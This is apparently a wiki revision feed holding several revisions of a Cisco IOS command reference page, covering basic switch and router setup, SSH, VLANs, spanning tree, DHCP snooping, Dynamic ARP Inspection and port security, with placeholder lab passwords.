== Dynamic ARP Inspection (DAI) ==&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI globally ===&lt;br /&gt;
Dynamic ARP Inspection requires DHCP Snooping to be enabled.&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI on a VLAN ===&lt;br /&gt;
Specify which VLANs should be protected.&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection vlan 10&lt;br /&gt;
 ip arp inspection vlan 20&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Trust uplinks and ports connected to other switches or routers.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip arp inspection trust&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. Invalid ARP packets are dropped.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip arp inspection trust&lt;br /&gt;
&lt;br /&gt;
=== Configure ARP rate limiting ===&lt;br /&gt;
Protect against ARP flooding attacks.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip arp inspection limit rate 15&lt;br /&gt;
&lt;br /&gt;
=== Verify DAI status ===&lt;br /&gt;
&lt;br /&gt;
 show ip arp inspection&lt;br /&gt;
 show ip arp inspection vlan&lt;br /&gt;
 show ip arp inspection interfaces&lt;br /&gt;
&lt;br /&gt;
=== Disable DAI ===&lt;br /&gt;
&lt;br /&gt;
 no ip arp inspection&lt;br /&gt;
 no ip arp inspection vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Requires &#039;&#039;&#039;DHCP Snooping&#039;&#039;&#039; to build the ARP binding table&lt;br /&gt;
* Only trusted ports can send unlimited ARP replies&lt;br /&gt;
* Access ports should remain untrusted&lt;br /&gt;
* Commonly deployed with &#039;&#039;&#039;PortFast + BPDU Guard&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
== Port Security ==&lt;br /&gt;
&lt;br /&gt;
=== Activate Port Security on an interface ===&lt;br /&gt;
The port cannot be a dynamic port:&lt;br /&gt;
 switchport mode access&lt;br /&gt;
Enable Port Security&lt;br /&gt;
 switchport port-security&lt;br /&gt;
&lt;br /&gt;
=== Set the maximum number of mac addresses that can be used on that port ===&lt;br /&gt;
 switchport port-security maximum 1&lt;br /&gt;
&lt;br /&gt;
=== Whitelist a specific mac address ===&lt;br /&gt;
 switchport port-security mac-address 0001.6311.E7BC&lt;br /&gt;
&lt;br /&gt;
=== Enable sticky mode to automatically learn mac addresses ===&lt;br /&gt;
 switchport port-security mac-address sticky&lt;br /&gt;
&lt;br /&gt;
=== Port Security Violation Modes ===&lt;br /&gt;
==== Protect ====&lt;br /&gt;
Silently drops packets from unknown MAC addresses while keeping the port up and generating no alerts.&lt;br /&gt;
 switchport port-security violation protect&lt;br /&gt;
&lt;br /&gt;
==== Restrict ====&lt;br /&gt;
Drops packets from unknown MAC addresses and logs the violation while incrementing the security counter.&lt;br /&gt;
 switchport port-security violation restrict&lt;br /&gt;
&lt;br /&gt;
==== Shutdown ====&lt;br /&gt;
Immediately disables the port when an unknown MAC address is detected, placing it into an error-disabled state.&lt;br /&gt;
 switchport port-security violation shutdown&lt;br /&gt;
&lt;br /&gt;
=== Port Security Aging ===&lt;br /&gt;
==== Enable static aging on an interface ====&lt;br /&gt;
 switchport port-security aging static&lt;br /&gt;
&lt;br /&gt;
==== Enable timed aging on an interface (5 minutes) ====&lt;br /&gt;
 switchport port-security aging time 5&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1073</id>
		<title>Cisco Commands</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1073"/>
		<updated>2026-02-04T22:14:30Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: /* IPv6 ND Other-Config Flag */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Cisco IOS Command Reference =&lt;br /&gt;
&lt;br /&gt;
A quick-reference guide for common Cisco IOS commands on switches and routers.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== System &amp;amp; Routing Basics ==&lt;br /&gt;
&lt;br /&gt;
=== Enable IPv4 Routing (Layer 3 Switches) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip routing&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable IPv6 Routing (Routers) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 unicast-routing&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Device &amp;amp; System Information ==&lt;br /&gt;
&lt;br /&gt;
=== Show MAC Address Table ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show mac address-table&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show OS and Device Version ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show version&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Logged-in Users ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show users&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Files ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
dir&lt;br /&gt;
dir nvram:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Configuration Files ==&lt;br /&gt;
&lt;br /&gt;
=== Show Configurations ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show running-config&lt;br /&gt;
show startup-config&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run interface g0/0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Filter Running Config (grep-like) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run | include {searchterm}&lt;br /&gt;
show run | begin {searchterm}&lt;br /&gt;
show run | section {section-name}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Save Running Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
copy running-config startup-config&lt;br /&gt;
copy run start&lt;br /&gt;
wr&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== User Privileges &amp;amp; Security ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Privileged Mode ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Encrypted Enable Password ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable secret ThisisaSecret&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Encrypt Plaintext Passwords (Weak Encryption)  ===&lt;br /&gt;
You can decrypt these with publicly available tools like https://keydecryptor.com/decryption-tools/cisco7&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
service password-encryption&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface &amp;amp; Network Status ==&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief&lt;br /&gt;
show ipv6 interface brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary (filtered to only interfaces with IPs) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief | exclude unassigned&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Routing Table ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip route&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== VLAN &amp;amp; Switching ==&lt;br /&gt;
&lt;br /&gt;
=== Show VLANs ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show vlan brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface VLAN Details ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show interface g0/1 switchport&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Trunk Interfaces ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show int trunk&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Clear Tables ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
clear mac address-table&lt;br /&gt;
clear arp-cache&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Telnet &amp;amp; Remote Access ==&lt;br /&gt;
&lt;br /&gt;
=== Connect via Telnet ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
connect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Hosts &amp;amp; Sessions ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show hosts&lt;br /&gt;
show sessions&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disconnect Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disconnect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Suspend Active Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Ctrl+Shift+6, then x&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== SSH Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Basic SSH Setup ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip domain-name cisco.com&lt;br /&gt;
crypto key generate rsa&lt;br /&gt;
ip ssh version 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove RSA Keys ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
crypto key zeroize rsa&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Create Local User ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
username admin secret ccna&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Default Gateway ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip default-gateway 192.168.10.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable SSH on VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 transport input ssh&lt;br /&gt;
 login local&lt;br /&gt;
 exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Global Configuration Mode ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Global Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
configure terminal&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disable DNS Lookup on Typos ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ip domain-lookup&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set MOTD Banner ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
banner motd MESSAGEHERE&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Hostname ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
hostname HOSTNAME&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Line Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Console Line ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line con 0&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Interface Selection ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface vlan 1&lt;br /&gt;
interface fa0/1&lt;br /&gt;
interface range fa0/2-3&lt;br /&gt;
interface range fa0/2-3,g0/1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable Interface ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip address 192.168.0.1 255.255.255.0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== VLAN Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create / Configure VLAN ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
vlan 10&lt;br /&gt;
 name MyAwesomeVlan&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Switchport Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Access Port ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
switchport mode access&lt;br /&gt;
switchport access vlan 10&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Trunk Port ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
switchport trunk encapsulation dot1q&lt;br /&gt;
switchport mode trunk&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Trunk VLAN Settings ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
switchport trunk allowed vlan 10,20,33,99&lt;br /&gt;
switchport trunk native vlan 99&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== IPv6 Interface Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv6 Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Assign Link-Local Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address fe80::1 link-local&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove IPv6 Addresses ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
no ipv6 address&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== IPv6 ND Other-Config Flag ===&lt;br /&gt;
Set the &amp;quot;Other Configuration&amp;quot; flag in IPv6 Neighbor Discovery (ND) messages. &lt;br /&gt;
- When enabled, it signals to IPv6 hosts that they should obtain additional configuration information (such as DNS server addresses) via DHCPv6, even if they have a stateless autoconfigured address.&lt;br /&gt;
&lt;br /&gt;
 ipv6 nd other-config-flag&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Spanning Tree ==&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on an interface ===&lt;br /&gt;
Use PortFast on edge/access ports that connect to end devices.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast globally ===&lt;br /&gt;
Enables PortFast on all access ports.&lt;br /&gt;
&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on a trunk (use with caution) ===&lt;br /&gt;
Only use when the trunk connects to a single end device (not another switch).&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast trunk&lt;br /&gt;
&lt;br /&gt;
=== Verify PortFast status ===&lt;br /&gt;
&lt;br /&gt;
 show spanning-tree interface GigabitEthernet0/1 detail&lt;br /&gt;
&lt;br /&gt;
=== Disable PortFast on an interface ===&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  no spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Best Practice: Enable BPDU Guard with PortFast ===&lt;br /&gt;
Shuts down the port if a BPDU is received, protecting against loops.&lt;br /&gt;
&lt;br /&gt;
Per interface:&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
  spanning-tree bpduguard enable&lt;br /&gt;
&lt;br /&gt;
Globally:&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
 spanning-tree bpduguard default&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Do &#039;&#039;&#039;not&#039;&#039;&#039; enable PortFast on ports connected to other switches&lt;br /&gt;
* Recommended for access/edge ports&lt;br /&gt;
* Incorrect use can cause Layer 2 loops&lt;br /&gt;
&lt;br /&gt;
== DHCP Snooping ==&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping globally ===&lt;br /&gt;
Enable DHCP Snooping for the switch.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping on a VLAN ===&lt;br /&gt;
DHCP Snooping only operates on specified VLANs.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping vlan 10&lt;br /&gt;
 ip dhcp snooping vlan 20&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Mark uplinks or ports connected to legitimate DHCP servers as trusted.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. DHCP server responses are blocked.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Snooping rate limiting ===&lt;br /&gt;
Protect against DHCP starvation attacks. Limits to 15 DHCP packets per second, will mark port as violating otherwise.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip dhcp snooping limit rate 15&lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Snooping status ===&lt;br /&gt;
&lt;br /&gt;
 show ip dhcp snooping&lt;br /&gt;
 show ip dhcp snooping binding&lt;br /&gt;
&lt;br /&gt;
=== Disable DHCP Snooping ===&lt;br /&gt;
&lt;br /&gt;
 no ip dhcp snooping&lt;br /&gt;
 no ip dhcp snooping vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Only trusted ports can send DHCP server messages&lt;br /&gt;
* Access ports should remain untrusted&lt;br /&gt;
* Commonly used with &#039;&#039;&#039;Dynamic ARP Inspection&#039;&#039;&#039; and &#039;&#039;&#039;IP Source Guard&#039;&#039;&#039;&lt;br /&gt;
* Requires correct VLAN configuration to function properly&lt;br /&gt;
&lt;br /&gt;
== Dynamic ARP Inspection (DAI) ==&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI globally ===&lt;br /&gt;
Dynamic ARP Inspection requires DHCP Snooping to be enabled.&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI on a VLAN ===&lt;br /&gt;
Specify which VLANs should be protected.&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection vlan 10&lt;br /&gt;
 ip arp inspection vlan 20&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Trust uplinks and ports connected to other switches or routers.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip arp inspection trust&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. Invalid ARP packets are dropped.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip arp inspection trust&lt;br /&gt;
&lt;br /&gt;
=== Configure ARP rate limiting ===&lt;br /&gt;
Protect against ARP flooding attacks.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip arp inspection limit rate 15&lt;br /&gt;
&lt;br /&gt;
=== Verify DAI status ===&lt;br /&gt;
&lt;br /&gt;
 show ip arp inspection&lt;br /&gt;
 show ip arp inspection vlan&lt;br /&gt;
 show ip arp inspection interfaces&lt;br /&gt;
&lt;br /&gt;
=== Disable DAI ===&lt;br /&gt;
&lt;br /&gt;
 no ip arp inspection&lt;br /&gt;
 no ip arp inspection vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Requires &#039;&#039;&#039;DHCP Snooping&#039;&#039;&#039; to build the ARP binding table&lt;br /&gt;
* Only trusted ports can send unlimited ARP replies&lt;br /&gt;
* Access ports should remain untrusted&lt;br /&gt;
* Commonly deployed with &#039;&#039;&#039;PortFast + BPDU Guard&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
== Port Security ==&lt;br /&gt;
&lt;br /&gt;
=== Activate Port Security on an interface ===&lt;br /&gt;
The port cannot be a dynamic port:&lt;br /&gt;
 switchport mode access&lt;br /&gt;
Enable Port Security&lt;br /&gt;
 switchport port-security&lt;br /&gt;
&lt;br /&gt;
=== Set the maximum number of mac addresses that can be used on that port ===&lt;br /&gt;
 switchport port-security maximum 1&lt;br /&gt;
&lt;br /&gt;
=== Whitelist a specific mac address ===&lt;br /&gt;
 switchport port-security mac-address 0001.6311.E7BC&lt;br /&gt;
&lt;br /&gt;
=== Enable sticky mode to automatically learn mac addresses ===&lt;br /&gt;
 switchport port-security mac-address sticky&lt;br /&gt;
&lt;br /&gt;
=== Port Security Violation Modes ===&lt;br /&gt;
==== Protect ====&lt;br /&gt;
Silently drops packets from unknown MAC addresses while keeping the port up and generating no alerts.&lt;br /&gt;
 switchport port-security violation protect&lt;br /&gt;
&lt;br /&gt;
==== Restrict ====&lt;br /&gt;
Drops packets from unknown MAC addresses and logs the violation while incrementing the security counter.&lt;br /&gt;
 switchport port-security violation restrict&lt;br /&gt;
&lt;br /&gt;
==== Shutdown ====&lt;br /&gt;
Immediately disables the port when an unknown MAC address is detected, placing it into an error-disabled state.&lt;br /&gt;
 switchport port-security violation shutdown&lt;br /&gt;
&lt;br /&gt;
=== Port Security Aging ===&lt;br /&gt;
==== Enable static aging on an interface ====&lt;br /&gt;
 switchport port-security aging static&lt;br /&gt;
&lt;br /&gt;
==== Enable timed aging on an interface (5 minutes) ====&lt;br /&gt;
 switchport port-security aging time 5&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1072</id>
		<title>Cisco Commands</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1072"/>
		<updated>2026-02-04T22:14:00Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: /* IPv6 ND Other-Config Flag */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Cisco IOS Command Reference =&lt;br /&gt;
&lt;br /&gt;
A quick-reference guide for common Cisco IOS commands on switches and routers.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== System &amp;amp; Routing Basics ==&lt;br /&gt;
&lt;br /&gt;
=== Enable IPv4 Routing (Layer 3 Switches) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip routing&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable IPv6 Routing (Routers) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 unicast-routing&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Device &amp;amp; System Information ==&lt;br /&gt;
&lt;br /&gt;
=== Show MAC Address Table ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show mac address-table&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show OS and Device Version ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show version&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Logged-in Users ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show users&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Files ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
dir&lt;br /&gt;
dir nvram:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Configuration Files ==&lt;br /&gt;
&lt;br /&gt;
=== Show Configurations ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show running-config&lt;br /&gt;
show startup-config&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run interface g0/0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Filter Running Config (grep-like) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run | include {searchterm}&lt;br /&gt;
show run | begin {searchterm}&lt;br /&gt;
show run | section {section-name}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Save Running Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
copy running-config startup-config&lt;br /&gt;
copy run start&lt;br /&gt;
wr&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== User Privileges &amp;amp; Security ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Privileged Mode ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Encrypted Enable Password ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable secret ThisisaSecret&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Encrypt Plaintext Passwords (Weak Encryption)  ===&lt;br /&gt;
You can decrypt these with publicly available tools like https://keydecryptor.com/decryption-tools/cisco7&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
service password-encryption&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface &amp;amp; Network Status ==&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief&lt;br /&gt;
show ipv6 interface brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary (filtered to only interfaces with IPs) ===&lt;br /&gt;
